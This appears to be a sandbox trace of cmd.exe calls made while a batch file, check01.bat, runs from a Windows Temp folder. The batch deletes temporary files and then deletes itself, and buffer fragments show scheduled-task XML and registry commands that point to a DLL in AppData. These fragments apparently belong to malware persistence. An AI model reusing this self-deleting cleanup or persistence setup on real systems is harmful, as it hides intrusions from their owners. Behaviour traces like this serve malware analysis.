[0380.873] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml")) returned 0x2020
[0380.873] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.873] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml")) returned 1
[0380.874] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x990e61e0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x990e61e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x9910c340, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x6fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z11.xml", cAlternateFileName="")) returned 0
[0380.874] GetLastError () returned 0x12
[0380.874] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.874] GetProcessHeap () returned 0x200000
[0380.874] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.875] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204f0 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.875] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.875] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201df0 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.875] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.875] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.875] GetProcessHeap () returned 0x200000
[0380.876] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.876] GetProcessHeap () returned 0x200000
[0380.876] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.876] GetProcessHeap () returned 0x200000
[0380.876] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.876] GetProcessHeap () returned 0x200000
[0380.876] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233500 | out: hHeap=0x200000) returned 1
[0380.876] GetProcessHeap () returned 0x200000
[0380.877] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.877] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.878] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.878] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.878] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.878] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.879] SetConsoleInputExeNameW () returned 0x1
[0380.879] GetConsoleOutputCP () returned 0x1b5
[0380.880] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.880] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.880] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.880] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.880] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.880] SetFilePointer (in: hFile=0x64, lDistanceToMove=2893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0380.881] GetProcessHeap () returned 0x200000
[0380.881] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233480 | out: hHeap=0x200000) returned 1
[0380.881] GetProcessHeap () returned 0x200000
[0380.881] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.881] GetProcessHeap () returned 0x200000
[0380.881] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0380.881] GetProcessHeap () returned 0x200000
[0380.881] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.881] GetProcessHeap () returned 0x200000
[0380.881] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.882] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.882] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0380.882] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x3e5, lpOverlapped=0x0) returned 1
[0380.882] SetFilePointer (in: hFile=0x64, lDistanceToMove=2919, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0380.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\check01.txt\"\r\n", cbMultiByte=26, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="Del \"%temp%\\check01.txt\"\r\n/f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 26
[0380.882] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.882] GetFileType (hFile=0x64) returned 0x1
[0380.883] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.883] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0380.883] GetProcessHeap () returned 0x200000
[0380.883] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23f3d0
[0380.883] GetProcessHeap () returned 0x200000
[0380.883] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2433f0
[0380.883] GetProcessHeap () returned 0x200000
[0380.883] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0380.883] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0380.883] GetProcessHeap () returned 0x200000
[0380.883] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.883] GetProcessHeap () returned 0x200000
[0380.884] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2433f0 | out: hHeap=0x200000) returned 1
[0380.884] GetProcessHeap () returned 0x200000
[0380.884] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23f3d0 | out: hHeap=0x200000) returned 1
[0380.884] _tell (_FileHandle=3) returned 2919
[0380.884] _close (_FileHandle=3) returned 0
[0380.885] _wcsicmp (_String1="Del", _String2="DIR") returned -4
[0380.885] _wcsicmp (_String1="Del", _String2="ERASE") returned -1
[0380.885] _wcsicmp (_String1="Del", _String2="DEL") returned 0
[0380.885] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.885] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x78) returned 0x201d70
[0380.885] GetProcessHeap () returned 0x200000
[0380.885] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x78
[0380.886] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x78) returned 0x220470
[0380.886] GetProcessHeap () returned 0x200000
[0380.886] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x78
[0380.886] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eee60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.886] GetProcessHeap () returned 0x200000
[0380.886] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.887] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edd70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.887] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee880, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.887] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.887] GetProcessHeap () returned 0x200000
[0380.887] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.887] GetProcessHeap () returned 0x200000
[0380.887] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.887] _wcsicmp (_String1="check01.txt", _String2=".") returned 53
[0380.887] _wcsicmp (_String1="check01.txt", _String2="..") returned 53
[0380.888] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt")) returned 0x2020
[0380.888] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.888] SetErrorMode (uMode=0x0) returned 0x0
[0380.888] SetErrorMode (uMode=0x1) returned 0x0
[0380.888] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", nBufferLength=0x104, lpBuffer=0x1edd90, lpFilePart=0x1edd80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", lpFilePart=0x1edd80*="check01.txt") returned 0x30
[0380.888] SetErrorMode (uMode=0x0) returned 0x1
[0380.889] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.889] GetProcessHeap () returned 0x200000
[0380.889] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.889] _wcsicmp (_String1="check01.txt", _String2=".") returned 53
[0380.889] _wcsicmp (_String1="check01.txt", _String2="..") returned 53
[0380.889] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt")) returned 0x2020
[0380.889] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.890] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt")) returned 1
[0380.890] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99073dc0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x99073dc0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="check01.txt", cAlternateFileName="")) returned 0
[0380.891] GetLastError () returned 0x12
[0380.891] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.891] GetProcessHeap () returned 0x200000
[0380.891] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.891] GetProcessHeap () returned 0x200000
[0380.891] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21da10 | out: hHeap=0x200000) returned 1
[0380.891] GetProcessHeap () returned 0x200000
[0380.891] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.891] GetProcessHeap () returned 0x200000
[0380.891] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220500 | out: hHeap=0x200000) returned 1
[0380.891] GetProcessHeap () returned 0x200000
[0380.892] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.892] GetProcessHeap () returned 0x200000
[0380.892] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.892] GetProcessHeap () returned 0x200000
[0380.892] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.892] GetProcessHeap () returned 0x200000
[0380.892] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.892] GetProcessHeap () returned 0x200000
[0380.893] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.893] GetProcessHeap () returned 0x200000
[0380.893] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233480 | out: hHeap=0x200000) returned 1
[0380.893] GetProcessHeap () returned 0x200000
[0380.893] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.893] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.893] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.894] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.894] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.895] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.895] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.895] SetConsoleInputExeNameW () returned 0x1
[0380.895] GetConsoleOutputCP () returned 0x1b5
[0380.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.896] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.896] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.897] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.897] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.897] SetFilePointer (in: hFile=0x64, lDistanceToMove=2919, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0380.897] GetProcessHeap () returned 0x200000
[0380.897] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x231400 | out: hHeap=0x200000) returned 1
[0380.897] GetProcessHeap () returned 0x200000
[0380.897] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.897] GetProcessHeap () returned 0x200000
[0380.897] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0380.897] GetProcessHeap () returned 0x200000
[0380.898] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.898] GetProcessHeap () returned 0x200000
[0380.898] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.898] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.898] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0380.898] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x3cb, lpOverlapped=0x0) returned 1
[0380.899] SetFilePointer (in: hFile=0x64, lDistanceToMove=2946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0380.899] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="(goto) 2>nul & del \"%~f0\"\r\n", cbMultiByte=27, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="(goto) 2>nul & del \"%~f0\"\r\nf\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 27
[0380.899] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.899] GetFileType (hFile=0x64) returned 0x1
[0380.899] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.899] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0380.899] GetProcessHeap () returned 0x200000
[0380.899] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23f3d0
[0380.900] GetProcessHeap () returned 0x200000
[0380.900] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x74) returned 0x233400
[0380.900] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x1eee70, lpFilePart=0x1ee9e0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1ee9e0*="check01.bat") returned 0x30
[0380.900] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x201740, cFileName="Users", cAlternateFileName="")) returned 0x21f4a0
[0380.900] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.901] memcpy (in: _Dst=0x1eee76, _Src=0x1ee73c, _Size=0xa | out: _Dst=0x1eee76) returned 0x1eee76
[0380.901] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x201740, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x21f4a0
[0380.901] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.901] _wcsnicmp (_String1="KEECFM~1", _String2="KEECFM~1", _MaxCount=0x8) returned 0
[0380.901] _wcsicmp (_String1="kEecfMwgj", _String2="KEECFM~1") returned -7
[0380.901] memcpy (in: _Dst=0x1eee82, _Src=0x1ee944, _Size=0x10 | out: _Dst=0x1eee82) returned 0x1eee82
[0380.901] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x201740, cFileName="AppData", cAlternateFileName="")) returned 0x21f4a0
[0380.902] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.902] memcpy (in: _Dst=0x1eee94, _Src=0x1ee73c, _Size=0xe | out: _Dst=0x1eee94) returned 0x1eee94
[0380.902] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf8f028a0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8f028a0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x201740, cFileName="Local", cAlternateFileName="")) returned 0x21f4a0
[0380.902] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.902] memcpy (in: _Dst=0x1eeea4, _Src=0x1ee73c, _Size=0xa | out: _Dst=0x1eeea4) returned 0x1eeea4
[0380.903] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xfb13a4e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xfb13a4e0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x201740, cFileName="Temp", cAlternateFileName="")) returned 0x21f4a0
[0380.903] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.903] memcpy (in: _Dst=0x1eeeb0, _Src=0x1ee73c, _Size=0x8 | out: _Dst=0x1eeeb0) returned 0x1eeeb0
[0380.903] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), lpFindFileData=0x1ee710 | out: lpFindFileData=0x1ee710*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf63dd9e0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf63dd9e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x201740, cFileName="check01.bat", cAlternateFileName="")) returned 0x21f4a0
[0380.903] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.903] memcpy (in: _Dst=0x1eeeba, _Src=0x1ee73c, _Size=0x16 | out: _Dst=0x1eeeba) returned 0x1eeeba
[0380.904] GetProcessHeap () returned 0x200000
[0380.904] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x72) returned 0x233480
[0380.904] GetProcessHeap () returned 0x200000
[0380.904] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23f3d0 | out: hHeap=0x200000) returned 1
[0380.904] _tell (_FileHandle=3) returned 2946
[0380.904] _close (_FileHandle=3) returned 0
[0380.905] _get_osfhandle (_FileHandle=2) returned 0xb
[0380.905] _get_osfhandle (_FileHandle=2) returned 0xb
[0380.905] _get_osfhandle (_FileHandle=2) returned 0xb
[0380.905] GetFileType (hFile=0xb) returned 0x2
[0380.905] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0380.906] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef208 | out: lpMode=0x1ef208) returned 1
[0380.906] _dup (_FileHandle=2) returned 3
[0380.907] _close (_FileHandle=2) returned 0
[0380.908] _wcsicmp (_String1="nul", _String2="con") returned 11
[0380.908] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef1b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.908] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 2
[0380.909] GetConsoleTitleW (in: lpConsoleTitle=0x1ef1b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.909] GetProcessHeap () returned 0x200000
[0380.910] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38) returned 0x216d70
[0380.910] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1eea40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1eea40, lpFilePart=0x1eea20 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eea20*="system32") returned 0x13
[0380.910] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0380.910] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x1ee750 | out: lpFindFileData=0x1ee750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd9240720, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xd9240720, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x21f4a0
[0380.910] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.910] memcpy (in: _Dst=0x1eea46, _Src=0x1ee77c, _Size=0xe | out: _Dst=0x1eea46) returned 0x1eea46
